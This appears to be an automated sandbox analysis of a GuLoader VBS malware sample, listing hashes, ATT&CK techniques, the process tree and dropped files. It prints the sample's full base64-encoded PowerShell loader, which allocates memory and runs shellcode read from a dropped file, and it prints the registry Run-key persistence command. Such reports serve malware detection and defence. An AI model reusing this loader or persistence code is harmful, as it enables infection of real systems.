guloader | 3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2024 05:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs
Size

91KB
MD5

151e6b10a9fc5d46ef2fe47db9341299
SHA1

d45038f32b1c203004eb68dbcccb292329707314
SHA256

3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40
SHA512

079660de624f04ce8d33c846e03f79c333adb038f0aacd3a22622d758fbb82ac7d50a6a6d09dfa52b8ce45b29863379b1c846525cdb1bec42edc06f668ed3382
SSDEEP

1536:6i/+uE7ixfTxj7/agTmpC5+MkpMBoCROhmIKyjr18mYFmSbm7wYsdtcwGLZXnzcP:vGB7ilT1/hoFpcRIKyP18mEbwaVihnzG

Score

10^/10

guloader defense_evasion discovery downloader persistence

Malware Config

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aargangsv = "%TORO% -w 1 $Oraclepa=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Slusevrks;%TORO% -encodedcommand($Oraclepa)"	ieinstal.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4520	powershell.exe
3396	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4520 set thread context of 3396	4520	powershell.exe	91

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieinstal.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4520	powershell.exe
4520	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4520	powershell.exe
4520	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4520	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 384 wrote to memory of 1560	384	WScript.exe	82
PID 384 wrote to memory of 1560	384	WScript.exe	82
PID 384 wrote to memory of 4520	384	WScript.exe	84
PID 384 wrote to memory of 4520	384	WScript.exe	84
PID 384 wrote to memory of 4520	384	WScript.exe	84
PID 4520 wrote to memory of 1412	4520	powershell.exe	86
PID 4520 wrote to memory of 1412	4520	powershell.exe	86
PID 4520 wrote to memory of 1412	4520	powershell.exe	86
PID 1412 wrote to memory of 3400	1412	csc.exe	87
PID 1412 wrote to memory of 3400	1412	csc.exe	87
PID 1412 wrote to memory of 3400	1412	csc.exe	87
PID 4520 wrote to memory of 4828	4520	powershell.exe	88
PID 4520 wrote to memory of 4828	4520	powershell.exe	88
PID 4520 wrote to memory of 4828	4520	powershell.exe	88
PID 4828 wrote to memory of 2424	4828	csc.exe	89
PID 4828 wrote to memory of 2424	4828	csc.exe	89
PID 4828 wrote to memory of 2424	4828	csc.exe	89
PID 4520 wrote to memory of 4004	4520	powershell.exe	90
PID 4520 wrote to memory of 4004	4520	powershell.exe	90
PID 4520 wrote to memory of 4004	4520	powershell.exe	90
PID 4520 wrote to memory of 3396	4520	powershell.exe	91
PID 4520 wrote to memory of 3396	4520	powershell.exe	91
PID 4520 wrote to memory of 3396	4520	powershell.exe	91
PID 4520 wrote to memory of 3396	4520	powershell.exe	91

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:384
- C:\Windows\System32\cmd.exe
  cmd /c ECHO powershell.exe
  2⤵
  PID:1560
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBFAHQAaABlAHIAIABHAGkAZgB0AGUAcgAgAEgAZABiAGsAbgBlAGQAIABGAG8AZABlAHIAcwAgAGoAdQByAHkAZQBuAGEAZAByACAAUgBlAHMAaQAgAEoAZQBuAGwAYQAgAEUAawBzAGUAawB2AGUAcgBlAGQAIABBAHAAbwBsAG8AIABTAHAAZwBlAGwAcwBlAHMAYQAgAGcAbwBkAHQAZwByACAAUwBnAGUAcAByAG8AYwBlAGQAIABTAHQAbwByAGYAeQByACAAUQB1AGEAcwBpAGMAbwAgAEUAbABlAGMAdAByAG8AcABoACAAQQBmAHAAYQB0AHIAIABTAGkAawBrAGUAcgBoACAAQQBuAGUAcwAgAEcAYQBmAGYAZQBsAHMAZQBqAGwAIABEAGkAcwBjAGwAYQBpAG0AZQAgAEEAdgBhAG4AYwBlACAASwBvAG4AZwBlAGwAbwB2AGUAbgAgAHMAdQBiAG8AcgBkACAAUgBhAGQAaQAgAEwAaQB2AGUAcwB0AGYAIABCAGkAegBhAHIAcgBlAHIAaQAgAEQAcgBlAGoAZQBmACAAVABpAGQAcwBmAHMAdABoAHYAbAAgAA0ACgANAAoAJABpAEsARgAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAdABvAGMAYQB6AHoAbwAoAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAZgBsAGUAdAB2AHIALABpAG4AdAAgAEYAbABqAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAE0AYQBkAG4AaQBuAGcAcAByACwAaQBuAHQAIABQAGEAYwBlAHcAYQB5ACwAaQBuAHQAIABNAGEAZABuAGkAbgBnAHAAcgA3ACkAOwAnADsADQAKACQAUABhAGMAZQB3AGEAeQAwACAAPQAgACIAVwBpAG4AMwAyACIADQAKACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGkASwBGACAALQBOAGEAbQBlACAAJABQAGEAYwBlAHcAYQB5ADAAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAATQBhAGQAbgBpAG4AZwBwAHIAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAE0AbwBkAGUALAB1AGkAbgB0ACAAUwB0AGUAcgBpACwAaQBuAHQAIABvAHAAZgBpAG4AZABlAGwAcwAsAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIAMAAsAGkAbgB0ACAAVAByAGkAbQBzAHQAbwBuAGUAdQAsAGkAbgB0ACAAVAB1AHIAYgBvAGoAZQB0ACwAaQBuAHQAIABzAHUAbgBkAGgAZQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUgBlAGEAZABGAGkAbABlACgAaQBuAHQAIABGAGwAagBhADAALAB1AGkAbgB0ACAARgBsAGoAYQAxACwASQBuAHQAUAB0AHIAIABGAGwAagBhADIALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbABqAGEAMwAsAGkAbgB0ACAARgBsAGoAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABGAGwAagBhADUALABpAG4AdAAgAEYAbABqAGEANgAsAGkAbgB0ACAARgBsAGoAYQA3ACwAaQBuAHQAIABGAGwAagBhADgALABpAG4AdAAgAEYAbABqAGEAOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBPAGsAdABhAHYAZQByAHMAdQBuACAAQwBvAG4AZAB5AGwAbwBzAGgAagAgAEEAbgBnAGwAZQBkACAAVQBuAGgAbwBvAGQAaQBuAGcAdAAgAEoAZQBuAGIAcgB5AG4AIABBAGwAZABlAHIAbQBhAG4AZQBzACAAQwBvAGEAcwB0ACAAUwBpAGQAZAAgAEcAbABvAG0AZQByAGEAIABGAG8AcgBoAGEAbgBkAGwAaQAgAFAAdQBtAHAAZQAgAE8AdABoAGUAbABsAG8AawBhACAAVABhAGIAZQBsAG8AdgBlAHIAbAAgAFAAbwBzAHQAZQByAG8AbABhAHQAIABCAGUAcABhAGsAawBlAGQAZQBzACAAVAB2AGUAawAgAGEAdQBrAHMAIABQAGgAYQBjAG8AcABpAGQAZABlACAASABlAGsAcwBlAGsAdQBuAHMAdAAgAGYAaQBuAHQAbQBhAHMAawBlACAAYQBsAHUAbgByACAATQBhAGwAZQBlAHMAeQBtAGYAbwAgAEgAagBsAHAAZQBmACAAVwBlAGsAZQAgAFUAZABmAHIAaQBlAG4AZAAgAFkAZABlAHIAawAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AHkAawBzAGEAIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADIAPQAiACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACIAIAArACAAIgBcAEYAbABnAGEAcgB0AGkAZgAuAGQAYQB0ACIADQAKACMAUABhAHIAdABsAGUAdAAgAEoAdQB2AGUAbAByAGwAIABLAGoAZQByAGUAcwB0ACAARABlAHYAbwB0AGkAbwBuACAATgBlAHUAdAByAGEAbABpACAAdgBhAGcAYgBvACAAVQBuAGQAZQByAGgAbwBsACAAUwBvAHIAdABhACAAUwBvAHIAdABhACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAYQB4AGUAdABpAG4AcwBpACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgAzAD0AMAA7AA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADkAPQAxADAANAA4ADUANwA2ADsADQAKAA0ACgANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA4AD0AJAB3ADoAOgBTAHQAbwBjAGEAegB6AG8AKAAtADEALABbAHIAZQBmAF0AJABNAGEAZABuAGkAbgBnAHAAcgAzACwAMAAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBDAGkAZABlACAASgB1AHIAeQBtAGUAZAAgAEYAeQBsAGQAZQBrAGEAIABTAHQAYQB0AHMAcwBrAGEAIABUAHIAaQBwAGkAbgAgAEMAcgBvAHMAaABhAGIAIABMAGUAaQBzACAAUABlAHIAcwBvAG4AIABHAG4AbwBzACAARQBtAGEAYwBpACAAQgBsAHUAbQBlAGkAbgBkACAAUwBhAG0AbQAgAFAAbwBsAHkAZQAgAFUAbAB2AGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAdQBwAG8AIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADQAPQBbAE0AYQBkAG4AaQBuAGcAcAByADEAXQA6ADoAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAJABNAGEAZABuAGkAbgBnAHAAcgAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEsAbABlAGIAaQAgAEEAbgB0AGkAawAgAEsAcgBpAHQAaQBrAHAAdQBuAGsAIABNAHUAbAB0AGkAcwB1AGwAYwAgAFQAbwB0AGEAbAAgAEQAZQBtAG8AbAAgAEUAZwBvAGMAZQAgAFIAaABhAGIAZABvAHMAZgAgAHMAYQBuAGQAcwAgAEQAaQBnAG8AbgBhACAATgBlAGEAdABlAG4AYgBpAGIAIABVAG4AbwBiAGwAaQBnAGUAZAAgAEEAZgBzAHAAbgAgAEIAbwByAGcAIAB0AGoAYQB2AHMAZQBkAGUAawBhACAAVQBuAGQAaQBzAG8AYgBsAGkAZwAgAFIAZQBnAHUAIABEAGEAbQBlAGIAZQBrACAAUwBrAG4AaABlAGQAZQByAG4AZQAgAEgAagBlAG0AZwBpAHYAZQAgAGQAZQBmAGwAbwByACAAVQBiAGUAbABhAHMAdAAgAEEAZwB0AHYAcgAgAFAAcwBlAHUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAaQBmAHQAZQByAHMAdQBzACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA1AD0AMAA7AA0ACgAjAEQAcgBpAHYAaAB1AHMAcAAgAEgAZQBhAGQAIABDAGgAcgBvAG0AbwBwACAARgBvAHIAZgByAHkAcwBuACAAUwBwAHkAZABrAGEAcwAgAEkAbgBkAHIAZQB0AG4AaQBuAGcAIABUAGUAcgBtAHcAaQBzAGUAcAAgAE0AZQBhAHMAbABlAGQAbgBlACAAbgBpAHQAcgBpACAARQB2AGUAbgB0AHkAcgBlAHIAZQAgAFMAdQBzAGEAbgBlAGUAbQBvACAAUQB1AGEAcgB0AGUAIABOAG8AbgBjAG8AbgAgAFUAbgB0AHIAaQBhACAARgBvAHIAcwBrACAASwBvAG0AbQBhAG4AIABFAGYAdABlAHIAcwBpACAAQQByAGMAaABpACAAUwBlAG0AaQBjAHIAIABXAGEAeQBiAGUAcgByAHkAcwAgAEkAbgBzAG8AZgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAGIAYQByAGIAYQB0ACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATQBhAGQAbgBpAG4AZwBwAHIANAAsACQATQBhAGQAbgBpAG4AZwBwAHIAMwAsADIAOQA3ADgAMwAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADUALAAwACkADQAKACMAVAByAG8AbABkACAARgB1AG4AaQBjAHUAbAAgAE8AcABzAGsAcgB1AG4AIAB3AGEAcwBwAGkAbgBlAHMAcwBiACAARABvAHcAbgBzAGgAaQBmACAARgByAHkAdABsAGUAcwBmAG8AcgAgAEgAbgBnAGUAYgByACAAUwBjAGgAbwAgAFAAZQBuAHQAYQBjACAAVABpAGwAcwB0AHIAYgBlAGwAIABBAHYAZQBzAHQAYQBuAGMAIABQAGEAbgBlAGcAIABWAGkAcgBrAGUAbABpACAAUgBvAG8AdAB3AG8AcgBtAG8AIABDAG8AbQBwAG8AbgBlAG4AdABpACAAUgBvAGMAaABlACAAcwBsAGEAbgAgAEoAYQBrAHUAbgBoAG8AdgBlAGQAIABCAHIAbgBkAGUAbgB1ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBVAG4AcABpAGwAbABhAGcAZQBkACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABNAGEAZABuAGkAbgBnAHAAcgAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAGUAbQBhAG4AZABtACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBsAHkAcwBuAGkAbgBnACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAdQByAGkAZgBpAGUAcgBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBrAGUAbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAaQBnAGgAdABhAGIAbABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGgAaQBqAGEAYwBrAGUAcgB1AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AGEAcgB0ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAaAB1AGQAZABlAHIAaQBuAGcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBvAHMAdABhAGwAcgBlAHAAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATQB1AHMAagBpAGQAbQBpAG4AYQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAHUAbQBtAGUAcgBpAG4AdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHUAcABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAYQByAGUAbABhAGQAZQAiACAADQAKAA=="
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z0mowhyz\z0mowhyz.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9683.tmp" "c:\Users\Admin\AppData\Local\Temp\z0mowhyz\CSC3C3F674191DD43FFBAFB2B1A9EBFFF2C.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3400
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kvl2yl2w\kvl2yl2w.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES976D.tmp" "c:\Users\Admin\AppData\Local\Temp\kvl2yl2w\CSC970DA3A7F4AE453588167B7A81839F88.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2424
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    PID:4004
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    - Checks QEMU agent file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9683.tmp

Filesize
1KB

MD5
17864b86f4482acff32b0bb9bfc327c9

SHA1
4e31312381cd40514c0b55a1ed21017cafe8d3a2

SHA256
9d3fd4af70afdcaa651a8bbf926a9ffcc0f6fe7b6905cbc835bfe5d4ee80569d

SHA512
34650a9dfba3692ae11e4c03c70d41d8ef7ee9df88a6d4af934fae1d1f527109bec8a8be9a5169b952d629c9954375a84b38f2c4402e63bb5fa7668448aeaf68

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES976D.tmp

Filesize
1KB

MD5
336886c65c16e718706bbfad763ae2d6

SHA1
e4b830d70c3df4e4a4bbaad7a77a04e86648cb9f

SHA256
aa70f7ce5e904880e3a006fac33c71886e61d5299220a1318cf4f9d399403747

SHA512
0931e6cdcab505bd3e9732dfd75021e23704c6f0bb1d80a662c8d4f2e5ed373e10a04c94f4a3d0ad4e08ad0ff62539d232ac8cdffece883c17aa0723888b3fb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xy1bsgdb.q2c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kvl2yl2w\kvl2yl2w.dll

Filesize
3KB

MD5
1655610e63b4cd8f571e6ff337460d58

SHA1
fb39ddb80b2c5d441184750a2a6662f87267d65e

SHA256
baade4d46af61f60ad99c249aca672f61372ca4ba528fe26678f47d09359b090

SHA512
65504174c4acf41205ddccac65d17572acd44e839b722c423c13ad6a6d888a7caa1c5c69bc2656bfa0a845317635bba0b068ce359b9a596b76f46b170949ccaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\z0mowhyz\z0mowhyz.dll

Filesize
3KB

MD5
51a55e6f5841d116475cddc69639cb8c

SHA1
ba3101eb303b92e8da94de9d1488a5a538d2060d

SHA256
0125d1246c86ba244d990fe3af7d9d471461ea68691087b133cdeb4a49fc0911

SHA512
193e50d0239e9d8eface204dcf65addc58b4cf78f00b3878c765605d5afbcd0a0365ec5ce93f521892cb262345df284773956314ed0704bcd1610e5dffec5fc4

Download Submit
C:\Users\Admin\AppData\Roaming\Flgartif.dat

Filesize
29KB

MD5
6a44848f3d6612e8dcf87e2412938989

SHA1
ca4e8e5f9a48274285ef5f45687c1b3abe19615b

SHA256
e84b3029900d2a23252863017a60e42cd3a543ff8963a95ff0d9ada2ca4449b0

SHA512
62604b5c148e7775abd9443b22004ac7fd9fea3a5ab68ed2f48c18ee02871282b735f00fec995c8c4df178ba73834e8fad8ed4b01121f5c8ff4435a752aaf64f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kvl2yl2w\CSC970DA3A7F4AE453588167B7A81839F88.TMP

Filesize
652B

MD5
d93907db10cc990873b9730fbd665712

SHA1
cc25f1edd1dcf852f5d235721bcec52aa38ba561

SHA256
0d1c3cf06ce356bd70785f364356ffa896a5e8d9d31fce6f521521421a0f8c87

SHA512
0c07289dfc7d245db11391eaae3188f16558317ee48f36c9ca420efd146eb291998f9dfee0c165eac4427735c0849a488de1199ed0deeda115ad316fdd2075b7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kvl2yl2w\kvl2yl2w.0.cs

Filesize
503B

MD5
ef368eb363272e6d4ea5b1859e789fe6

SHA1
0f69004d7b24f3c1f2b0faa219105cce6f9dbc8e

SHA256
9de8875ab310a4cf0640d5cfeda93c83c6684df4fae40e5da036009734086a59

SHA512
0db4930e4f9e4685bfdab1c5f2e7923012f27ee6de7630e989ea0069b6b561be01d8b008cad5f50233c5900e64646d18976389f234817af8ab077b0dc86c44d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kvl2yl2w\kvl2yl2w.cmdline

Filesize
369B

MD5
772cd79c9cf526bf000ecbcc16f79bdb

SHA1
e3a40ea8644e466020ea6263aac5358f234aabe7

SHA256
23499e352b1671371952afa0f7994c29f129f3419a6a418c51ff7acfdc01e5b1

SHA512
0bff9bde4b1f32ff699cd33febd64ac2deb7dad9dd144625aa03fc8ffc6610c2740899a5f1ab327e2ef93076262bfd72c672af3d23d441149078cc741e0eb748

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0mowhyz\CSC3C3F674191DD43FFBAFB2B1A9EBFFF2C.TMP

Filesize
652B

MD5
31aef57012874aebae629263bcc84d62

SHA1
7ff28ab361e94b6c8b22d6801826090db82dabf9

SHA256
b7532330334184538e87576c3529a7019a0d99e8f606b5ae6f6b7ba2c9dd5b40

SHA512
878e74b7824b587ef3ceea59198f2e7c135e415623926522d2bf8ccb1f5c1553fcc0d8c21107905a58cc39a10b766d844f3add1cc7f07ce2d3d6775e752960b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0mowhyz\z0mowhyz.0.cs

Filesize
312B

MD5
1f5f578f802a7fdec720af4972875e7c

SHA1
ededcc25c3e56d7892b094d989114514d3d56fc2

SHA256
bef779b96488d834f2dca6fb5ca98f41471ebdc48051c984af33cf126a238b46

SHA512
240b8ad8a78c42779d138f370ff91151ac68cdf60fa946b7123641e82eb2b467a82db990efdbfe684f397280bce07462e9f966bd1b91e46176e5c50e05f2d3e4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0mowhyz\z0mowhyz.cmdline

Filesize
369B

MD5
6b2c6e1e40667e2fe11ebaa2008d1f36

SHA1
cbf2440d9edbd45d1120bb5a62ab0309fac64198

SHA256
da13979ec50d800a455be1706c51deea4e824ccecc92463e21056784c7dedbbe

SHA512
fdfb4427076f7c8d6444d4f2007bf6fa468cadd14a138f7519d37d31e2ee6cc89621a4731287803307a834619a732c1b87b58ebc503c59d0c5bb2f945981b345

Download Submit
memory/3396-62-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3396-59-0x0000000000940000-0x0000000000A40000-memory.dmp

Filesize
1024KB

Download
memory/4520-6-0x0000000005530000-0x0000000005552000-memory.dmp

Filesize
136KB

Download
memory/4520-9-0x0000000005DE0000-0x0000000006134000-memory.dmp

Filesize
3.3MB

Download
memory/4520-22-0x0000000007E30000-0x00000000084AA000-memory.dmp

Filesize
6.5MB

Download
memory/4520-21-0x0000000006A70000-0x0000000006AB4000-memory.dmp

Filesize
272KB

Download
memory/4520-5-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download
memory/4520-36-0x0000000007820000-0x0000000007828000-memory.dmp

Filesize
32KB

Download
memory/4520-3-0x0000000075120000-0x00000000758D0000-memory.dmp

Filesize
7.7MB

Download
memory/4520-20-0x00000000065B0000-0x00000000065FC000-memory.dmp

Filesize
304KB

Download
